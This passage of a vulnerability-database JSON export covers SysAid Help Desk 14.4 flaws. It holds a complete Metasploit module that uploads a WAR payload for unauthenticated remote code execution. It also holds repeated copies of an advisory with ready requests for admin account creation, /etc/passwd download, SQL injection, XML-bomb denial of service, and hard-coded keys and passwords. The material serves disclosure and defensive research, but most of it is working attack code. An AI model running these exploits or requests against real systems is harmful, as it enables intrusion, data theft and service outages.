ganttSQL parameter. \n \n \n8) \nVulnerability: Denial of service \nCVE-2015-2996 (same CVE as #4) \nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero \n \nThis request will cause the cpu to go to 100% and the memory to \nballoon for 30+ seconds. Sending lots of requests causes the server to \nslow down to a crawl (although it doesn't seem to crash or hang \nforever). \n \n \n9) \nVulnerability: XML Entity Expansion (leading to denial of service) \nCVE-2015-3000 \nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \na) \nPOST /sysaid/agententry?deflate=0 \n<?xml version=\"1.0\"?> \n<!DOCTYPE lolz [ \n<!ENTITY lol \"lol\"> \n<!ELEMENT lolz (#PCDATA)> \n<!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\"> \n<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\"> \n<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\"> \n<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\"> \n<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\"> \n<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\"> \n<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\"> \n<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\"> \n<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\"> \n]> \n<lolz>&lol9;</lolz> \n \nb) \nPOST /sysaid/rdsmonitoringresponse \n<lol bomb in POST data> \n \nc) \nPOST /sysaid/androidactions \n<lol bomb in POST data> \n \nThese requests will cause the cpu to go to 100% and the memory to \nballoon for 10+ seconds. Sending lots of requests causes the server to \nslow down to a crawl (although it doesn't seem to crash or hang \nforever). 
\n \n \n10) \nVulnerability: Uncontrolled file overwrite \nCVE-2015-2993 (same CVE as #1) \nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm \n \nThis will overwrite the file with \"SysAid\". This string is fixed and \ncannot be controlled by the attacker. \n \n \n11) \nVulnerability: Use of hard-coded password for the SQL Server Express \nadministrator account \nCVE-2015-3001 \nConstraints: N/A \nAffected versions: unknown, at least 14.4 \n \nWhen installing SysAid on Windows with the built in SQL Server \nExpress, the installer sets the sa user password to \"Password1\". \n \n \n>> Fix: \nUpgrade to version 15.2 or higher. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132138/sysaidhelpdesk-execdos.txt", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-05T23:33:58", "description": "This Metasploit module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in an insecure way. Combining both weaknesses a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection against null byte injection in file names. This Metasploit module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. 
In theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability from being exploited.", "cvss3": {}, "published": "2015-07-20T00:00:00", "type": "zdt", "title": "SysAid Help Desk rdslogs Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2995"], "modified": "2015-07-20T00:00:00", "id": "1337DAY-ID-23898", "href": "https://0day.today/exploit/description/23898", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => \"SysAid Help Desk 'rdslogs' Arbitrary File Upload\",\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.\r\n The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated\r\n file uploads and handles zip file contents in an insecure way. Combining both weaknesses\r\n a remote attacker can accomplish remote code execution. Note that this will only work if the\r\n target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection\r\n against null byte injection in file names. This module has been tested successfully on version\r\n v14.3.12 b22 and v14.4.32 b25 in Linux. 
In theory this module also works on Windows, but SysAid\r\n seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability\r\n from being exploited.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-2995' ],\r\n [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]\r\n ],\r\n 'DefaultOptions' => { 'WfsDelay' => 30 },\r\n 'Privileged' => false,\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jun 3 2015'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptInt.new('SLEEP',\r\n [true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n OptString.new('TARGETURI',\r\n [true, 'Base path to the SysAid application', '/sysaid/'])\r\n ], self.class)\r\n end\r\n\r\n\r\n def check\r\n servlet_path = 'rdslogs'\r\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'rdsName' => bogus_file\r\n }\r\n })\r\n\r\n if res && res.code == 200\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n\r\n def exploit\r\n app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n tomcat_path = '../../../../'\r\n servlet_path = 'rdslogs'\r\n\r\n # We need to create the upload directories before our first attempt to upload the WAR.\r\n print_status(\"#{peer} - Creating upload directory\")\r\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\n send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' => 
Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),\r\n 'ctype' => 'application/xml',\r\n 'vars_get' => {\r\n 'rdsName' => bogus_file\r\n }\r\n })\r\n\r\n war_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\n # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail\r\n print_status(\"#{peer} - Uploading WAR file...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' => Zlib::Deflate.deflate(war_payload),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'rdsName' => \"#{tomcat_path}/tomcat/webapps/#{app_base}.war\\x00\"\r\n }\r\n })\r\n\r\n # The server either returns a 200 OK when the upload is successful.\r\n if res && res.code == 200\r\n print_status(\"#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment\")\r\n register_files_for_cleanup(\"tomcat/webapps/#{app_base}.war\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - WAR upload failed\")\r\n end\r\n\r\n 10.times do\r\n select(nil, nil, nil, 2)\r\n\r\n # Now make a request to trigger the newly deployed war\r\n print_status(\"#{peer} - Attempting to launch payload in deployed WAR...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n 'method' => 'GET'\r\n })\r\n # Failure. The request timed out or the server went away.\r\n break if res.nil?\r\n # Success! 
Triggered the payload, should have a shell incoming\r\n break if res.code == 200\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-05] #", "sourceHref": "https://0day.today/exploit/23898", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T05:12:44", "description": "SysAid Help Desk version 14.4 suffers from code execution, denial of service, path disclosure, remote file upload, remote SQL injection, directory traversal, file download, and various other vulnerabilities.", "cvss3": {}, "published": "2015-06-04T00:00:00", "type": "zdt", "title": "SysAid Help Desk 14.4 Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-04T00:00:00", "id": "1337DAY-ID-23705", "href": "https://0day.today/exploit/description/23705", "sourceData": "Found lots of vulns in SysAid Help Desk 14.4, including RCE.\r\nSysAid have informed me they all have been fixed in 15.2, but no\r\nre-test was performed.\r\n\r\nFull advisory below, and a copy can be obtained at [1].\r\n5 Metasploit modules have been released and currently awaiting merge\r\nin the moderation queue [2].\r\n\r\nRegards,\r\nPedro\r\n\r\n[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt\r\n[2]:\r\nhttps://github.com/rapid7/metasploit-framework/pull/5470\r\nhttps://github.com/rapid7/metasploit-framework/pull/5471\r\nhttps://github.com/rapid7/metasploit-framework/pull/5472\r\nhttps://github.com/rapid7/metasploit-framework/pull/5473\r\nhttps://github.com/rapid7/metasploit-framework/pull/5474\r\n\r\n>> Multiple vulnerabilities in SysAid Help Desk 14.4\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information 
Security\r\n=================================================================================\r\nDisclosure: 03/06/2015 / Last updated: 03/06/2015\r\n\r\n>> Background on the affected product:\r\n\"SysAid is an ITSM solution that offers all the essentials, with\r\neverything you need for easy and efficient IT support and effective\r\nhelp desk operations. Its rich set of features includes a powerful\r\nservice desk, asset management and discovery, self-service, and\r\neasy-to-use tools for understanding and optimizing IT performance.\"\r\n\r\nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been\r\nreleased and should be integrated in the Metasploit framework soon.\r\nAll vulnerabilities affect both the Windows and Linux versions unless\r\notherwise noted.\r\n\r\n\r\n>> Technical details:\r\n1)\r\nVulnerability: Administrator account creation\r\nCVE-2015-2993 (same CVE as #10)\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123\r\n\r\nThis creates an account with the following credentials: mr_lit:secret\r\nNote that this vulnerability only seems to be exploitable ONCE!\r\nSubsequent attempts to exploit it will fail even if the tomcat server\r\nis restarted.\r\n\r\n\r\n2)\r\nVulnerability: File upload via directory traversal (authenticated;\r\nleading to remote code execution)\r\nCVE-2015-2994\r\nConstraints: valid administrator account needed (see #1 to create a\r\nvalid admin account)\r\nAffected versions: unknown, at least 14.4\r\n\r\n\r\nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------81351919525780\r\n\r\n-----------------------------81351919525780\r\nContent-Disposition: form-data; name=\"activation\"; filename=\"whatevs.jsp\"\r\nContent-Type: 
application/octet-stream\r\n\r\n<html><body><%out.println(System.getProperty(\"os.name\"));%></body><html>\r\n-----------------------------81351919525780--\r\n\r\n\r\nThe response returns a page which contains the following:\r\n var imageUrl =\r\n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501\";\r\n var thumbUrl =\r\n\"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501\";\r\n if(imageUrl != null && $.trim(imageUrl).length > 0)\r\n {\r\n document.getElementById(\"cropbox\").src = imageUrl;\r\n document.getElementById(\"preview\").src = thumbUrl;\r\n parent.glSelectedImageUrl =\r\n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp\";\r\n\r\nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp\r\nto execute the JSP.\r\n\r\n\r\n3)\r\nVulnerability: File upload via directory traversal (unauthenticated;\r\nleading to remote code execution)\r\nCVE-2015-2995\r\nConstraints: no authentication or any other information needed. The\r\nserver has to be running Java 7u25 or lower. This is because Java 7u40\r\n(FINALLY!) rejects NULL bytes in file paths. See\r\nhttp://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more\r\ndetails.\r\nAffected versions: unknown, at least 14.3 and 14.4\r\n\r\nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00\r\n<... 
WAR payload here ...>\r\n\r\n\r\n4)\r\nVulnerability: Arbitrary file download\r\nCVE-2015-2996 (same CVE as #8)\r\nConstraints: none; no authentication or any other information needed\r\n(see #5 to obtain the traversal path)\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\r\n\r\n\r\n5)\r\nVulnerability: Path disclosure\r\nCVE-2015-2997\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4; only works on the Linux version\r\n\r\nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>\r\n\r\nMetasploit PoC:\r\n\r\n large_traversal = '../' * rand(15...30)\r\n servlet_path = 'getAgentLogFile'\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' =>\r\nZlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) +\r\nrand(300))),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'accountId' => large_traversal +\r\nRex::Text.rand_text_alphanumeric(8 + rand(10)),\r\n 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))\r\n }\r\n })\r\n\r\nThe response (res.body.to_s) will be similar to:\r\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\r\n<HTML>\r\n<HEAD><TITLE>Error</TITLE></HEAD>\r\n<BODY>\r\n<H1>Internal Error No#14</H1>\r\n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip\r\n(Permission denied)</H2>\r\n</BODY></HTML>\r\n\r\nThe tomcat path is revealed between the H2 tags.\r\n\r\n\r\n6)\r\nVulnerability: Use of hard-coded cryptographic key\r\nCVE-2015-2998\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nSysAid Help Desk uses a hard-coded encryption key and encryption\r\nparameters. 
If this is combined with an arbitrary file download\r\nvulnerability (such as #4), a malicious user can then decrypt the\r\ndatabase password by downloading the WEB-INF/conf/serverConf.xml file.\r\nAlgorithm: DES password based encryption with MD5 hash\r\nKey: \"inigomontoya\"\r\nSalt: [-87, -101, -56, 50, 86, 53, -29, 3]\r\nIterations: 19\r\n\r\n\r\n7)\r\nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp\r\nCVE-2015-2999\r\nConstraints: valid administrator account needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/genericreport HTTP/1.1\r\naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ngroupFilter\r\n\r\naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no\r\n\r\nParameters:\r\ncustomSQL\r\n\r\naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ncustomSQL\r\n\r\n(
3 different payloads are shown because the reportName parameter seems\r\nto change which parameters have the injection)\r\n\r\n\r\nb)\r\nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE\r\nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=\r\n\r\nParameter:\r\ndir\r\n\r\n\r\nc)\r\nPOST /sysaid/RFCGantt.jsp 
HTTP/1.1\r\nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true\r\n\r\nAccepts injection between $$ in ganttSQL parameter.\r\n\r\n\r\n8)\r\nVulnerability: Denial of service\r\nCVE-2015-2996 (same CVE as #4)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero\r\n\r\nThis request will cause the cpu to go to 100% and the memory to\r\nballoon for 30+ seconds. 
Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n9)\r\nVulnerability: XML Entity Expansion (leading to denial of service)\r\nCVE-2015-3000\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/agententry?deflate=0\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE lolz [\r\n <!ENTITY lol \"lol\">\r\n <!ELEMENT lolz (#PCDATA)>\r\n <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\r\n <!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\r\n <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\r\n <!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\r\n <!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\r\n <!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\r\n <!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\r\n <!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\r\n <!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\r\n]>\r\n<lolz>&lol9;</lolz>\r\n\r\nb)\r\nPOST /sysaid/rdsmonitoringresponse\r\n<lol bomb in POST data>\r\n\r\nc)\r\nPOST /sysaid/androidactions\r\n<lol bomb in POST data>\r\n\r\nThese requests will cause the cpu to go to 100% and the memory to\r\nbaloon for 10+ seconds. Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n10)\r\nVulnerability: Uncontrolled file overwrite\r\nCVE-2015-2993 (same CVE as #1)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm\r\n\r\nThis will overwrite the file with \"SysAid\". 
This string is fixed and\r\ncannot be controlled by the attacker.\r\n\r\n\r\n11)\r\nVulnerability: Use of hard-coded password for the SQL Server Express\r\nadministrator account\r\nCVE-2015-3001\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nWhen installing SysAid on Windows with the built in SQL Server\r\nExpress, the installer sets the sa user password to \"Password1\".\r\n\r\n\r\n>> Fix:\r\nUpgrade to version 15.2 or higher.\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/23705", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T12:23:28", "description": "The RdsLogsEntry servlet in SysAid Help Desk before 15.2 does not properly check file extensions, which allows remote attackers to upload and execute arbitrary files via a NULL byte after the extension, as demonstrated by a .war%00 file.", "cvss3": {}, "published": "2015-06-08T14:59:00", "type": "cve", "title": "CVE-2015-2995", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2995"], "modified": "2018-10-09T19:56:00", "cpe": ["cpe:/a:sysaid:sysaid:15.1"], "id": "CVE-2015-2995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2995", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sysaid:sysaid:15.1:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nSysAid Help Desk 14.4 - Multiple Vulnerabilities", 
"edition": 2, "cvss3": {}, "published": "2015-06-10T00:00:00", "title": "SysAid Help Desk 14.4 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-10T00:00:00", "id": "EXPLOITPACK:731246BBF736D94C1AB6AB77C5502B82", "href": "", "sourceData": ">> Multiple vulnerabilities in SysAid Help Desk 14.4\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 03/06/2015 / Last updated: 10/06/2015\n\n>> Background on the affected product:\n\"SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. 
Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance.\"\n\nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon.\nAll vulnerabilities affect both the Windows and Linux versions unless otherwise noted.\n\n\n>> Technical details:\n1)\nVulnerability: Administrator account creation\nCVE-2015-2993 (same CVE as #10)\nConstraints: none; no authentication or any other information needed\nAffected versions: unknown, at least 14.4\n\nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123\n\nThis creates an account with the following credentials: mr_lit:secret\nNote that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted.\n\n\n2)\nVulnerability: File upload via directory traversal (authenticated; leading to remote code execution)\nCVE-2015-2994\nConstraints: valid administrator account needed (see #1 to create a valid admin account)\nAffected versions: unknown, at least 14.4\n\n\nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------------81351919525780\n\n-----------------------------81351919525780\nContent-Disposition: form-data; name=\"activation\"; filename=\"whatevs.jsp\"\nContent-Type: application/octet-stream\n\n<html><body><%out.println(System.getProperty(\"os.name\"));%></body><html>\n-----------------------------81351919525780--\n\n\nThe response returns a page which contains the following:\n var imageUrl = \"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501\";\n var thumbUrl = \"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501\";\n if(imageUrl != null && $.trim(imageUrl).length > 0)\n {\n 
document.getElementById(\"cropbox\").src = imageUrl;\n document.getElementById(\"preview\").src = thumbUrl;\n parent.glSelectedImageUrl = \"icons/user_photo/14222767515000.1049804910604456_temp.jsp\";\n \nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP.\n\n\n3)\nVulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution)\nCVE-2015-2995\nConstraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details.\nAffected versions: unknown, at least 14.3 and 14.4\n\nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00\n<... WAR payload here ...>\n\n\n4)\nVulnerability: Arbitrary file download\nCVE-2015-2996 (same CVE as #8)\nConstraints: none; no authentication or any other information needed (see #5 to obtain the traversal path)\nAffected versions: unknown, at least 14.4\n\nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\n\n\n5)\nVulnerability: Path disclosure\nCVE-2015-2997\nConstraints: none; no authentication or any other information needed\nAffected versions: unknown, at least 14.4; only works on the Linux version\n\nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>\n\nMetasploit PoC:\n\n large_traversal = '../' * rand(15...30)\n servlet_path = 'getAgentLogFile'\n \n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\n 'method' => 'POST',\n 'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),\n 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))\n }\n })\n \nThe response (res.body.to_s) will be 
